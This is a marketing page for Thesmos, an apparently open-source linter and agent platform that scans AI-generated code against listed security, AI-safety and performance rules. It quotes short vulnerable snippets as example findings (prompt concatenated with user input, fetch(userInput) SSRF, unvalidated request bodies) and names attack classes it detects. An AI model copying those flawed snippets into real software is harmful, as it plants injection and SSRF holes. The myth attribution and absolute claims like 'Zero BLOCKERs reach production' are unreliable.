HolleyStudios
Open Source · FSL-1.1 · v3.6.0 · 1,075 Rules

PROMETHEUS

AI gives your code the speed of gods.Thesmos gives it their wisdom.

npm install --save-dev thesmos-governance

View on GitHub →See it on your codebase
1,075
Rules
12
Ecosystems
6
Gov. Pillars
0
Config

In Greek myth, Thesmos stole fire from the gods and gave it to humanity. AI coding tools gave humanity the same fire — raw speed, infinite generation. But fire without governance burns. Thesmos enforces the rules Olympus kept for themselves: security, correctness, architectural integrity, and AI safety.

Real Findings in AI-Generated Code

This is what Thesmos catches.

BLOCKERAI_013

Prompt Injection via User Input

const res = await llm(systemPrompt + userMessage)

User input concatenated directly into the system prompt. Allows adversarial prompt injection.

src/api/ai/chat.ts:34

BLOCKERZOD_008

Missing Input Validation

const { amount } = await req.json()

No Zod schema on POST route body. Unvalidated data reaches the database.

src/app/api/orders/route.ts:12

HIGHDB_003

N+1 Query Pattern

orders.map(o => await prisma.item.findMany(...))

Prisma queries inside a loop. 100 orders = 101 database round-trips.

src/components/OrderList.tsx:22

1,075
Total rules
12
Ecosystems
6
Governance pillars
v3.6
Current version

Full AI-Stack Governance

Beyond linting. Every layer of your AI stack.

🔍

Scan & Health Score

thesmos scan grades your codebase A+ through F. Every finding categorised by severity across 6 governance pillars.

🤖

Autopilot

Natural language to executed code. thesmos autopilot generate 'add Stripe checkout' plans, branches, builds, and self-reviews.

AI Adapters

thesmos adapters syncs governance rules to Claude, Cursor, Copilot, Gemini, and Codex — one command, every AI tool aligned.

🧠

Compaction Brain

Generates .thesmos/brain.md — context that survives Claude Code's compaction so Thesmos remembers architecture decisions, suppressions, and open investigations.

🔮

Learning Brain (BYOK)

Observe → analyze → propose → approve → promote. Uses your own Anthropic API key to surface high false-positive rules, propose custom rules, and scaffold them into TypeScript stubs via brain:promote. Always opt-in, cost-capped.

📚

Prompt Library

Pre-built prompts for security remediation, PR review prep, health recovery, and onboarding. Auto-suggested after each scan when conditions match.

🏗️

Builder Wizard

8-question guided wizard builds agents, skills, dashboards, RAG pipelines, and workflows. Codebase-aware — reads your stack, pre-fills answers. Governance-scans everything it generates.

🔄

Self-Governance

Thesmos governs itself. Detects stale hooks, outdated installs, old adapters, and aged brain snapshots. thesmos self:check + self:repair fix everything automatically.

🛡️

Agent Scope Enforcement

Prevents AI agents from writing outside defined workspace boundaries. Every Bash and Write call intercepted before it runs.

📦

Supply Chain Guard

10 rules covering lockfile integrity, registry poisoning, postinstall network fetches, and typosquatting. Flags phantom packages before they ship.

💰

Token Budget Governance

Per-session and daily AI cost caps with alert and hard-stop thresholds. Every tool call logged to .thesmos/token-usage.jsonl.

✉️

Commit + Vercel Governance

Enforces Conventional Commits on every commit-msg hook. Validates Vercel config for secret leaks, missing CRON_SECRET, and redirect patterns.

Thesmos Autopilot

Branch. Build. Journal.

Describe a feature in plain language. Autopilot creates a branch, executes the plan step by step, journals every decision, and self-reviews against all 1,075 governance rules before surfacing a PR.

Every action is logged. Every rule checked. If governance fails mid-session, Autopilot pauses and asks — it never ships a BLOCKER.

thesmos autopilot generate "add Stripe checkout"
🌿

Plan

Converts natural language into a governed task graph. Each step scoped, reversible, and rule-checked.

⚙️

Execute

Runs each task with full tool access — file edits, shell commands, test runs — all within agent scope limits.

📓

Journal

Every decision logged to .thesmos/autopilot/journal.md. Every rule evaluated. Full audit trail.

🔍

Review

Self-reviews the diff against 1,075 rules before opening the PR. No BLOCKER reaches main.

See It Run

What thesmos scan looks like.

Why Thesmos is Different

Every other platform gives you instructions.
Thesmos gives you governance.

⚖️

Governed Outputs

Every God Agent output is checked against 1,075 Thesmos rules and carries a governance badge. Ship confidence, not hope.

🗡️

Built-in Challenger

God Agent Momus challenges every major decision before it executes. The only agent platform with a permanent devil's advocate.

The God Council

When agents conflict, God Agent Zeus arbitrates. One decision. Clear ownership. No agent debates that block execution.

🌊

Drift Detection

God Agent Proteus monitors your product, prompts, and architecture for drift. Know when you've strayed from the plan before it costs you a sprint.

CapabilityChatGPT GPTsCursor AgentsClaude ProjectsThesmos God Agents
Governance-checked outputs
Built-in challenger agent
Cross-agent arbitration
Drift detection
Calibrated confidence markersPartial
Adversarial self-check
BYOK / zero surveillanceN/AN/AN/A

The 40 God Agents

Every agent output is Thesmos-governed.

40 expert AI specialists — Zeus, Athena, Ares, Hermes, and 36 more — each with deep domain methodology and Thesmos governance baked into every output. Zeus, Athena, and Argus are free. All 40 available with Pantheon Pro.

Meet the Pantheon →Get Pantheon Pro — $79/yr

What It Covers

1,075 rules across every layer of your AI stack.

Security + DAST

130+ rules
  • SQL injection
  • SSRF
  • open redirect
  • path traversal
  • JWT decode without verify

AI Safety

65+ rules
  • Prompt injection via user input
  • LLM key in client bundle
  • AI output used as HTML
  • unvalidated LLM JSON

Authentication

45+ rules
  • Missing auth middleware
  • userId from request body
  • JWT algorithm none
  • hardcoded credentials

Next.js / React

90+ rules
  • cookies() in client component
  • useEffect async callback
  • window in SSR
  • conditional hook call

Supply Chain

10+ rules
  • git:// scheme in package.json
  • missing lockfile
  • postinstall network fetch
  • non-HTTPS registry

Infrastructure

20+ rules
  • FROM node:latest
  • no USER in Dockerfile
  • K8s pod with no resource limits
  • Terraform public S3 bucket

Observability

10+ rules
  • Route with no logger import
  • silent catch block
  • auth event not logged
  • DB call with no timing

Performance

60+ rules
  • N+1 queries
  • sync fs in handler
  • missing pagination
  • bundle bloat imports

Database

45+ rules
  • findMany without limit
  • multi-write without transaction
  • raw SQL injection
  • DROP TABLE migration

AI Governance

55+ rules
  • Token budget exceeded
  • Agent scope violation
  • Supply chain phantom pkg
  • AI debt fingerprint

Self-Governance

10+ rules
  • Stale thesmos install
  • broken git hook path
  • aged brain snapshot
  • outdated adapter

Packs (GDPR, CVE…)

400+ rules
  • GDPR consent gate
  • CVE-2024-xxxx pattern
  • SOC 2 audit log
  • Data residency

Get Started in Minutes

Install once. Govern everything.

01

Install

npm install --save-dev thesmos-governance

One package. Zero config. Works on any JS/TS project.

02

Scan & Grade

thesmos scan

Get your first health grade A+ through F. Every finding ranked by severity across 1,075 rules.

03

Teach Your AI

thesmos adapters

Syncs 1,075 rules to Claude, Cursor, Copilot, Gemini, and Codex — instantly.

04

Gate Every PR

thesmos review --staged

Run as a pre-commit hook or GitHub Actions step. No BLOCKER reaches main.

05

Build an Agent

thesmos build:agent

8-question wizard creates a governance-scanned AI agent for your exact stack in minutes.

06

Grow the Brain

thesmos brain:learn && brain:promote --rule=CUSTOM_001

Observe patterns, propose custom rules with your own API key, approve them, and scaffold a TypeScript rule stub in one flow.

07

Launch Autopilot

thesmos autopilot generate "add Stripe checkout"

Branch. Build. Self-review. Governed AI execution from a single prompt.

How Clients Benefit

Every project Holley Studio ships is Thesmos-verified.

When we deliver a system, you receive documentation showing every Thesmos rule checked and every BLOCKER finding resolved. You're not trusting us — you're verifying it.

For technical clients, we run Thesmos in your CI pipeline after delivery — gating every future pull request. Zero BLOCKERs reach production. Ever.

Book a call to see it live →

Real BLOCKERs caught in AI-generated code

[SEC_001]

Supabase admin client in browser bundle

[SEC_002]

Row Level Security disabled on tables

[AUTH_007]

Admin route with no authentication middleware

[AI_001]

LLM API key loaded in client component

[AI_013]

User input interpolated directly into system prompt

[VIBE_002]

fetch(userInput) — classic AI-generated SSRF pattern

[NEXT_003]

cookies() called inside 'use client' component

[DB_001]

DROP TABLE in migration without backup strategy

For Agencies

White-label your QA process.

Add Thesmos to your own agency's CI/CD pipeline. Ship AI-generated code confidently. Differentiate from competitors who can't prove their code quality.

Talk about integration →

For Developers

Run it on your own codebase.

Open source (FSL-1.1-MIT, free for personal and open source use). CLI scanner, GitHub Actions, VS Code extension, npm package. Works on any JavaScript/TypeScript project. Zero config.

View on GitHub →

The gods kept governance for themselves.

Now you have it.

1,075 rules. Zero config. Free for open source and internal use. One command away from a governed AI development workflow.

View on GitHubBook a Discovery Call

Node.js 18+ · FSL-1.1-MIT (→ MIT 2030) · Built by Holley Studio